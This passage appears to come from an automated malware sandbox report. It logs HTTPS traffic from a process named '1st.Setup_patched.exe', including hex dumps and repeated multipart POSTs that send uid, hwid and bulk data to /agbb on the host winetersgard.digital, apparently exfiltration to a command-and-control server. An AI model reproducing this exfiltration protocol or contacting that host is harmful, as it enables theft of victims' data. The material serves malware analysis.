                                                                          Data Ascii: dR@iZ&$EtR y^dp~sgj<BQWB/']YkC)@Tcaa~1[@#j{7:ktsb0 )Ti>v)9ajGMGc[LX>8?~[L#^KDh5?Y[*E=9-;27VJX}dx!e
                                                                          2025-04-13 15:06:29 UTC1369INData Raw: ef 89 d8 5e 92 3e f2 76 22 fb cb 03 84 03 b4 ff dd 8d 42 69 ee f4 28 14 50 40 73 51 b0 a8 93 11 c7 83 17 e8 9d d8 91 ce 18 57 a8 4a 33 48 67 c4 67 c9 15 d0 84 49 28 bc d9 1a c6 19 46 3a 29 70 c4 28 96 b0 2f 5f 55 f9 b0 23 aa 0f 3f f4 98 df f5 83 b0 b3 1e 4c f6 64 d9 d1 8e 4b 71 c0 46 18 a1 b9 04 e8 2d 27 1f e1 3e 85 7f ed 8f 0c f7 7d 7e 46 04 0e f3 1f 4b 42 06 25 aa 58 1a 26 8a 99 3e 30 bb f0 c5 7e 17 c6 d0 67 ca 67 13 a4 5d da 36 80 72 c3 89 83 bf 13 49 00 3f a1 fb a3 d8 ab 5f 66 3b 76 82 25 59 04 d8 e9 68 aa 40 f4 42 4e 43 5a e0 8c 56 5d 5e b4 47 63 45 6b 14 e7 13 fa d4 de 29 06 ad b0 0e b7 f7 8f d1 6c 28 3c 7b b5 f5 bb 9c 8f fb 27 68 e1 5f b7 b8 77 f5 69 d4 27 0b f2 a7 20 ac 3b ae 1b 8c b9 00 8d 0a 37 5e a8 2c ba 9e 42 08 f6 f2 da d2 89 ec 09 96 1d a4
                                                                          Data Ascii: ^>v"Bi(P@sQWJ3HggI(F:)p(/_U#?LdKqF-'>}~FKB%X&>0~gg]6rI?_f;v%Yh@BNCZV]^GcEk)l(<{'h_wi' ;7^,B
                                                                          2025-04-13 15:06:29 UTC1369INData Raw: c1 5d a6 66 8d 94 80 83 97 97 4b 6a 06 39 36 b6 d5 f0 c0 dd 04 b9 fd 09 37 11 02 11 0e 89 c4 8c 26 9d 0e 1f fd 19 26 27 8a 77 a3 47 ce 14 e3 37 eb f4 4a c0 31 58 93 4d 13 a4 04 61 45 1d 93 13 44 32 4a c9 ac 3e 4d 93 68 44 11 99 7f 59 41 fd 81 10 0e 1a ae 61 3b 37 d7 fb e9 77 2f 5d ee 36 e1 fd 8e b5 50 7c 94 48 96 15 3a 19 d6 54 cc 62 93 c7 cd f7 25 04 3c 28 f5 4d 23 bc ce 24 f1 c0 8a 55 63 55 a7 b8 bd 44 6c 97 29 c6 98 d0 06 75 5a f5 e1 5a 2a ea 25 d9 1b 31 11 e2 e1 b3 86 3d 7a 48 84 11 37 ae ae ea 5b eb f4 2a 69 61 be 0c 82 ae 74 18 9c de 53 64 d0 e6 76 9d 6d 83 cd 43 79 64 ec 3e ba 30 c1 e6 5e 69 60 2d 9b a5 14 1c b6 cf a6 07 ac 45 96 a7 31 88 cf 4d 78 72 26 52 55 2d c7 81 02 2f f8 0a a9 5a 1c d1 99 9d dd b5 12 00 fe 1e 7f 71 fd f7 84 ae 9e e1 87 b4 0b
                                                                          Data Ascii: ]fKj967&&'wG7J1XMaED2J>MhDYAa;7w/]6P|H:Tb%<(M#$UcUDl)uZZ*%1=zH7[*iatSdvmCyd>0^i`-E1Mxr&RU-/Zq
                                                                          2025-04-13 15:06:29 UTC1369INData Raw: 9c 38 f0 77 43 f3 c5 30 97 32 06 0a 76 23 fc 0e 6d 9d a1 b2 3a b0 2c 6b a0 ee 9f 3f 13 6c e1 b2 f6 33 da 47 a4 2f d4 e3 68 b7 82 73 a0 ec 82 cb 0a c9 83 0b 9e 55 7b f7 eb 84 1a 40 48 12 f1 e4 cb 95 c1 29 65 2d 75 62 46 95 6e 8f fb 6b 02 12 09 fb 50 c4 49 c1 aa 60 ff eb 5b 2a 4b c9 f6 36 06 20 2f 2f ed 1d 6c f2 5c bb 14 88 a3 78 24 be 2b 96 eb 34 e7 70 55 50 3a 19 8e ee ff 92 88 6b 4d a1 37 d9 15 8e 69 f1 30 af 8d 12 0a 0d ef e7 db bf de 6a 85 56 6d 92 02 0e 2f b6 a1 e0 44 65 c8 74 94 32 ca a6 f1 ed 1f 6f 93 c2 79 5e c6 b3 ad 4d fb 66 3b 9a a0 e3 ce 54 2e d4 b3 3d f1 5b b6 73 04 c9 7d f0 87 b2 59 7b 8c 2a 11 d2 73 a6 71 f7 5d 85 7c c5 17 3c 6c 4f a9 89 af 6c 2d 02 6a 6c 0c b8 cd 13 ec 0c a9 c5 c9 0d 4d 69 95 27 a8 64 04 a9 56 a4 13 a5 74 4a 56 2e 3a d5 5e
                                                                          Data Ascii: 8wC02v#m:,k?l3G/hsU{@H)e-ubFnkPI`[*K6 //l\x$+4pUP:kM7i0jVm/Det2oy^Mf;T.=[s}Y{*sq]|<lOl-jlMi'dVtJV.:^
                                                                          2025-04-13 15:06:29 UTC1369INData Raw: 9a b9 d8 ea ce 91 1a 12 dc a4 cd 33 79 bb b7 c8 c4 b9 9f d2 f3 93 34 2c c3 f1 31 bf ec 6f d0 81 6c f7 02 6e d9 d4 17 5e fd e1 a0 5d 1b 04 1b b4 63 16 1b 86 38 24 c7 70 f3 7b ed c9 4d 32 27 32 c2 9b ba ad b1 08 9d 94 ed 62 b7 bc 9a 40 31 31 3f 75 9d 2e 0d 9a ba aa 0e 31 54 c6 33 aa 82 9d 21 88 56 4f 10 22 34 56 8e a4 b8 f0 83 49 55 6d da 39 b4 19 dd 21 a9 d3 3e 3e 08 93 1b ba 0d 67 95 54 e2 56 ce d3 d6 f3 6d 3c 8f 8e ce 57 fa 79 59 38 b2 a5 d9 6d b1 ff 25 dc 99 93 e2 3a 16 00 bf b8 83 f3 e5 ce f6 84 fd b2 c6 ba 4f 17 c1 6d 41 87 59 2e 25 7f 55 13 5a c6 15 f7 04 1a a3 1c 25 b7 72 bf 80 fc 8b 29 80 95 3b 11 59 12 58 79 9f 04 2b 4c 85 cb a7 6b f4 8a 37 51 9a c9 bb 6b 1f 29 78 2c a3 a0 a5 03 75 c0 fc 45 92 ee 4a 87 98 82 38 2a da 1b e3 86 cf c8 a1 f7 c1 41 87
                                                                          Data Ascii: 3y4,1oln^]c8$p{M2'2b@11?u.1T3!VO"4VIUm9!>>gTVm<WyY8m%:OmAY.%UZ%r);YXy+Lk7Qk)x,uEJ8*A
                                                                          2025-04-13 15:06:29 UTC1369INData Raw: 98 b0 b1 17 78 20 eb a6 37 6d 1c dc 0c d2 2b e1 fe d9 93 f1 f2 06 5b 69 b8 92 9d 30 39 62 09 06 1b 55 97 08 29 ba 44 e1 7f 13 c5 0a 07 80 ef 88 dc 68 46 29 49 ea 38 62 f8 67 42 8e a4 e4 3c c1 67 b8 4b 95 fc fb 55 94 28 4d bb 70 ca 12 15 aa a8 ef dc d2 40 83 8c bb 93 0f 0e 6d 28 d8 7f 22 48 86 29 fe 04 94 9e f1 39 42 a0 11 ea f6 18 75 7c 41 7a a5 bc cd ac 7f 34 bc af 35 4f 6d 8d fe a7 78 e1 83 0e 00 80 b2 4a 2e 89 af f4 bf 64 00 8c 99 4f 86 78 95 da 4a 56 0f 5a fe 1b 96 76 96 6b 7a 9e 21 81 84 fd fd 07 74 8a 55 77 44 94 cd a0 ad 00 a8 ef 97 ca e1 91 dd 7f e7 a2 50 ee 69 4a 87 29 71 8c 36 67 35 65 cf a1 6e fb c8 ba af 50 5f bb 10 2a 5b 0e b9 9a 3f c0 8c f9 74 c9 a4 68 65 d6 ca 92 1f a2 b6 6d 3f 6b 33 17 f0 80 81 27 ac 37 43 56 60 53 21 c3 cf 39 05 0d 0e b6
                                                                          Data Ascii: x 7m+[i09bU)DhF)I8bgB<gKU(Mp@m("H)9Bu|Az45OmxJ.dOxJVZvkz!tUwDPiJ)q6g5enP_*[?them?k3'7CV`S!9
                                                                          2025-04-13 15:06:29 UTC1369INData Raw: d9 1f 45 13 15 d8 ac 2d 03 c2 66 31 b8 2e e5 1c 21 b9 14 6a 7c 6c d3 c5 54 ff 5d 09 00 95 bc f6 b4 84 a3 db 1c 6f 6b be 65 48 6b 55 78 46 40 3a c4 19 e2 26 b1 40 93 c1 13 4c f2 5a 28 a2 4d 96 29 57 68 87 46 d7 2b 38 87 f6 ce 2f 82 c0 e5 a4 59 ca 40 d5 18 f8 11 88 c2 a1 db a6 36 ba 61 58 af ef d4 f2 54 9d a7 bb 5b e7 bf 39 15 da bf 7e a4 98 03 a9 09 5e 62 27 9c 2e 4b 72 d7 e4 db ad 74 28 29 6b a2 57 8c 25 65 b2 ae 8d 48 b3 a8 d5 e7 44 ca 99 3e 17 0f da 1b 91 98 a8 7f d6 d2 70 cb 3a 75 6b bf 91 66 91 52 70 2d ce 97 94 f6 12 e0 f9 d0 af 9a 67 ad 0e 71 8b 48 7c 10 f9 6f 7b e7 c3 52 ff 4b 1a f0 d3 b7 8a 71 70 fc 37 fc 11 8c e3 d4 0a af 12 8f 31 0b a4 74 f4 be b2 f5 61 0c d7 7c 9c 01 71 df db 07 fc 2b 7c 4f 1a 3f a3 00 8d 88 6f 1f 65 27 be 4e 55 3c 9a ba 35 ce
                                                                          Data Ascii: E-f1.!j|lT]okeHkUxF@:&@LZ(M)WhF+8/Y@6aXT[9~^b'.Krt()kW%eHD>p:ukfRp-gqH|o{RKqp71ta|q+|O?oe'NU<5
                                                                          2025-04-13 15:06:29 UTC1369INData Raw: 78 2b 2a 58 26 e3 2a 5f 34 ea 52 e6 15 83 cf cb df 35 28 e8 00 96 9d b5 73 e2 75 df a9 07 d2 2d e5 db a9 71 e4 f5 b3 2b 45 0f ac 12 44 4e 58 47 d0 00 d3 2b 60 eb f6 57 f5 78 e4 9a 87 6e 87 ab a1 bd 0a 8a c7 7f c5 88 14 44 3c c3 15 ec a8 25 aa cd 06 95 ef d5 35 cc b9 b1 91 de 21 46 a9 72 d0 63 1d a2 ee 4d 03 02 f1 ae 78 d8 4f 3e 50 2d d7 f3 d4 13 41 b3 9e 16 0b 9d de 0a 19 08 e0 fd 3b 6c 8e 50 af 7d 8f 70 9c 88 73 92 ad aa cd a4 17 b5 eb fd e0 94 e7 90 c4 d6 e1 d2 a9 53 43 e2 91 76 2e 71 68 7d 61 14 30 97 3d 0b f4 da 82 26 58 5b f5 69 53 ea cc ad 64 9d c1 4b 46 53 18 a5 d2 f6 18 69 88 a0 a7 c3 21 4a 8b 67 60 a3 52 fc 6d ab 24 a2 17 35 41 fa fc 90 2e 90 b4 09 61 a7 ed 2e 68 2d 88 cf ba 2a 1b 73 f9 ea a9 d6 25 e1 9b a7 ac ac 44 76 2e c3 f7 eb 6f b1 f8 42 9a
                                                                          Data Ascii: x+*X&*_4R5(su-q+EDNXG+`WxnD<%5!FrcMxO>P-A;lP}psSCv.qh}a0=&X[iSdKFSi!Jg`Rm$5A.a.h-*s%Dv.oB
                                                                          2025-04-13 15:06:29 UTC772INData Raw: 2d 0a 6f e9 7a 21 d5 51 8e 51 df 92 e6 7b 38 60 77 67 de 19 01 9c b8 0f 2a 74 a6 55 32 aa 7f 0c b8 eb 72 15 67 25 4b bf 74 09 25 32 74 13 e8 fd eb bf 00 d6 2a c7 1a f8 c3 00 03 96 6d 66 7c 43 af 85 a1 1f e6 84 e5 38 59 01 1b 16 63 e4 53 b4 9e 7a b3 ca 14 7d 70 48 d2 31 44 55 e3 e6 d1 73 5e 70 ec 97 d6 2e 8c 6b 8a 89 3c bd 27 15 ed 10 17 f2 24 bd d7 6e de b2 4b b0 67 fa d2 29 28 62 86 a6 eb 8a a8 36 4f 8c ed 9d 13 a2 f7 95 70 1b 25 59 f2 cb 2d 89 dc ce 8e c1 6f 38 2b 2e 48 7e 4e 8c 68 1f 1d f2 1d c7 2c c6 82 62 49 a5 cd 5b 2a 66 73 89 37 03 e3 c0 22 0a d7 7c 0b 06 6d a8 25 f6 fb d2 cd 83 c7 68 9e fb 11 fc da 02 c5 97 0a 58 dd f3 d5 da c8 8e ce 7a 87 89 2e 39 d8 6b 8e 3a 73 17 0c b8 1e 84 9a 94 b9 a3 f5 d7 a3 85 0b 7b 7c 19 24 0b 02 29 69 c5 71 7a ce d0 e6
                                                                          Data Ascii: -oz!QQ{8`wg*tU2rg%Kt%2t*mf|C8YcSz}pH1DUs^p.k<'$nKg)(b6Op%Y-o8+.H~Nh,bI[*fs7"|m%hXz.9k:s{|$)iqz


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.649693104.21.13.1264437344C:\Users\user\Desktop\1st.Setup_patched.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-04-13 15:06:31 UTC286OUTPOST /agbb HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=YOpKtGMCUpnvdl5Or
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                          Content-Length: 14916
                                                                          Host: winetersgard.digital
                                                                          2025-04-13 15:06:31 UTC14916OUTData Raw: 2d 2d 59 4f 70 4b 74 47 4d 43 55 70 6e 76 64 6c 35 4f 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 30 63 36 62 34 38 39 61 36 62 31 33 61 36 32 32 31 32 64 36 36 63 63 37 34 39 38 38 65 65 37 30 30 31 37 66 65 65 32 32 38 62 66 36 0d 0a 2d 2d 59 4f 70 4b 74 47 4d 43 55 70 6e 76 64 6c 35 4f 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 4f 70 4b 74 47 4d 43 55 70 6e 76 64 6c 35 4f 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 31 39
                                                                          Data Ascii: --YOpKtGMCUpnvdl5OrContent-Disposition: form-data; name="uid"0c6b489a6b13a62212d66cc74988ee70017fee228bf6--YOpKtGMCUpnvdl5OrContent-Disposition: form-data; name="pid"2--YOpKtGMCUpnvdl5OrContent-Disposition: form-data; name="hwid"CA19
                                                                          2025-04-13 15:06:32 UTC823INHTTP/1.1 200 OK
                                                                          Date: Sun, 13 Apr 2025 15:06:32 GMT
                                                                          Content-Type: application/json
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tOBQLcpTdnhy97Dc3CAh7%2Fn2xgRdqpT885xQZsj%2BgrPsUQ5yuX2s9VyV8HAFR3tQFJC5zwEqfPUf04tsBoS0mTELmtWBjztubQ60bTxBWWlL3Lwrztchg%2BKVqJFoSAxPCHU0u%2FnXrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 92fbde28fb5431b6-JAX
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=113260&min_rtt=113167&rtt_var=23937&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2853&recv_bytes=15860&delivery_rate=35643&cwnd=252&unsent_bytes=0&cid=0374984390dc28f7&ts=1822&x=0"
                                                                          2025-04-13 15:06:32 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a
                                                                          Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.649694104.21.13.1264437344C:\Users\user\Desktop\1st.Setup_patched.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-04-13 15:06:33 UTC283OUTPOST /agbb HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=I8l04pKGI9rn2p
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                          Content-Length: 15082
                                                                          Host: winetersgard.digital
                                                                          2025-04-13 15:06:33 UTC15082OUTData Raw: 2d 2d 49 38 6c 30 34 70 4b 47 49 39 72 6e 32 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 30 63 36 62 34 38 39 61 36 62 31 33 61 36 32 32 31 32 64 36 36 63 63 37 34 39 38 38 65 65 37 30 30 31 37 66 65 65 32 32 38 62 66 36 0d 0a 2d 2d 49 38 6c 30 34 70 4b 47 49 39 72 6e 32 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 49 38 6c 30 34 70 4b 47 49 39 72 6e 32 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 31 39 41 39 31 42 33 46 35 46 44
                                                                          Data Ascii: --I8l04pKGI9rn2pContent-Disposition: form-data; name="uid"0c6b489a6b13a62212d66cc74988ee70017fee228bf6--I8l04pKGI9rn2pContent-Disposition: form-data; name="pid"2--I8l04pKGI9rn2pContent-Disposition: form-data; name="hwid"CA19A91B3F5FD
                                                                          2025-04-13 15:06:34 UTC818INHTTP/1.1 200 OK
                                                                          Date: Sun, 13 Apr 2025 15:06:34 GMT
                                                                          Content-Type: application/json
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dCWflLKbNJ0a1rYIIhfFndwDXM0i%2FcCor4hN7IlpxW7MnDCkhHmORA9a875VXymtzDzFWpTf4KcTwcgSnCPwghdy2J9TZQFluFHhvQwHqIb4N%2BztXHEVPNTyllr4LmtUudl2KJUI2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 92fbde384c32678d-ATL
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=106100&min_rtt=105986&rtt_var=22533&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2852&recv_bytes=16023&delivery_rate=37964&cwnd=252&unsent_bytes=0&cid=75263fed954d23a5&ts=718&x=0"
                                                                          2025-04-13 15:06:34 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a
                                                                          Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}
                                                                          2025-04-13 15:06:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.649695104.21.13.1264437344C:\Users\user\Desktop\1st.Setup_patched.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-04-13 15:06:34 UTC282OUTPOST /agbb HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=70Cp7SfrnMWWU
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                          Content-Length: 19934
                                                                          Host: winetersgard.digital
                                                                          2025-04-13 15:06:34 UTC15331OUTData Raw: 2d 2d 37 30 43 70 37 53 66 72 6e 4d 57 57 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 30 63 36 62 34 38 39 61 36 62 31 33 61 36 32 32 31 32 64 36 36 63 63 37 34 39 38 38 65 65 37 30 30 31 37 66 65 65 32 32 38 62 66 36 0d 0a 2d 2d 37 30 43 70 37 53 66 72 6e 4d 57 57 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 37 30 43 70 37 53 66 72 6e 4d 57 57 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 31 39 41 39 31 42 33 46 35 46 44 41 36 37
                                                                          Data Ascii: --70Cp7SfrnMWWUContent-Disposition: form-data; name="uid"0c6b489a6b13a62212d66cc74988ee70017fee228bf6--70Cp7SfrnMWWUContent-Disposition: form-data; name="pid"3--70Cp7SfrnMWWUContent-Disposition: form-data; name="hwid"CA19A91B3F5FDA67
                                                                          2025-04-13 15:06:34 UTC4603OUTData Raw: dc b9 f0 15 0a 88 90 8b f5 b9 8c fb f4 a4 46 40 ae dd 5c bb 2d b0 bb 30 c4 7e 74 63 37 d1 78 4b d2 30 81 82 cd d9 c7 5c d1 5e ef 2e 27 c5 af 10 3e b5 66 d1 a6 1b 9d fb fb 7d 68 ee 73 0b cb f8 07 50 ec 56 6b b2 c8 1a 22 ba e6 e9 34 5e f9 2a 12 ee 94 0f 78 2e d4 52 42 c9 47 7e 8d 95 a5 b6 68 56 27 fa bd 09 26 42 d2 00 8d 0f 7b f8 46 fe 5a 01 bc 50 a3 66 fa 12 c6 52 7e 49 76 db c3 21 4c fb 7b 46 fa b0 4c da 17 30 0f dc 28 09 21 d4 36 8d 9f 4a 12 07 38 ad 05 e8 a4 2c e5 eb c5 60 b7 52 a5 29 4b dc 8b 99 ff 72 08 b1 dd fe dd f5 c8 03 10 73 ee 31 c1 a7 e6 a7 bc 5e 78 93 ca ee e3 59 cd 8b 7d 8f 12 8e 31 a1 ab 4b 2d bb f9 58 fd a6 c3 89 c4 4e 05 6f 7d b7 5a 72 99 fe 35 32 cb be f6 88 3a 92 7a d1 11 c9 9d 5f 48 ae 0c ff 6b 8e 3f 95 1c ca e9 f4 df b9 32 96 25 94 5a
                                                                          Data Ascii: F@\-0~tc7xK0\^.'>f}hsPVk"4^*x.RBG~hV'&B{FZPfR~Iv!L{FL0(!6J8,`R)Krs1^xY}1K-XNo}Zr52:z_Hk?2%Z
                                                                          2025-04-13 15:06:35 UTC820INHTTP/1.1 200 OK
                                                                          Date: Sun, 13 Apr 2025 15:06:35 GMT
                                                                          Content-Type: application/json
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VN5AbckunwwgY2kyu8aYYMDHQdKMiIZUrEus5gzXcXjdqqiQf7xhtW6PYWxmBtdKfeRL1JXnYINlN1OeB4PW%2FD9eN3LMUHJcOOXWkzhC%2BSy9SHaCbuXjI2QzD387%2FxXY5VKQg6GuKQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 92fbde3fd9c63382-JAX
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=115638&min_rtt=114832&rtt_var=25047&sent=14&recv=23&lost=0&retrans=0&sent_bytes=2853&recv_bytes=20896&delivery_rate=35144&cwnd=252&unsent_bytes=0&cid=d9814f500756ec9b&ts=757&x=0"


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.649696104.21.13.1264437344C:\Users\user\Desktop\1st.Setup_patched.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-04-13 15:06:38 UTC284OUTPOST /agbb HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=7Obr30h9KvMddt00
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                          Content-Length: 2649
                                                                          Host: winetersgard.digital
                                                                          2025-04-13 15:06:38 UTC2649OUTData Raw: 2d 2d 37 4f 62 72 33 30 68 39 4b 76 4d 64 64 74 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 30 63 36 62 34 38 39 61 36 62 31 33 61 36 32 32 31 32 64 36 36 63 63 37 34 39 38 38 65 65 37 30 30 31 37 66 65 65 32 32 38 62 66 36 0d 0a 2d 2d 37 4f 62 72 33 30 68 39 4b 76 4d 64 64 74 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 4f 62 72 33 30 68 39 4b 76 4d 64 64 74 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 31 39 41 39 31
                                                                          Data Ascii: --7Obr30h9KvMddt00Content-Disposition: form-data; name="uid"0c6b489a6b13a62212d66cc74988ee70017fee228bf6--7Obr30h9KvMddt00Content-Disposition: form-data; name="pid"1--7Obr30h9KvMddt00Content-Disposition: form-data; name="hwid"CA19A91
                                                                          2025-04-13 15:06:39 UTC824INHTTP/1.1 200 OK
                                                                          Date: Sun, 13 Apr 2025 15:06:39 GMT
                                                                          Content-Type: application/json
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mvIb0isGYYV7K4CgWUdtjd544j7UiAQ4m1Ju4%2B7NMKQOe%2FHnKPta80hCQupbm7hG1Ovwlo5MXkkO5ZQpzKqYE3IHVNQ%2Fbhsz5y1V4Y6YiWNcRgVY7X%2BeDPNJL%2Fy%2FcsI6mUD7Lqc0sQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 92fbde590b4ec002-ATL
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=105902&min_rtt=105876&rtt_var=22378&sent=6&recv=10&lost=0&retrans=0&sent_bytes=2852&recv_bytes=3569&delivery_rate=38092&cwnd=241&unsent_bytes=0&cid=0e1d7c0ac7470577&ts=628&x=0"
                                                                          2025-04-13 15:06:39 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a
                                                                          Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}
                                                                          2025-04-13 15:06:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.649697104.21.13.1264437344C:\Users\user\Desktop\1st.Setup_patched.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-04-13 15:06:40 UTC285OUTPOST /agbb HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=h63S99l26bbMnl8
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                          Content-Length: 589263
                                                                          Host: winetersgard.digital
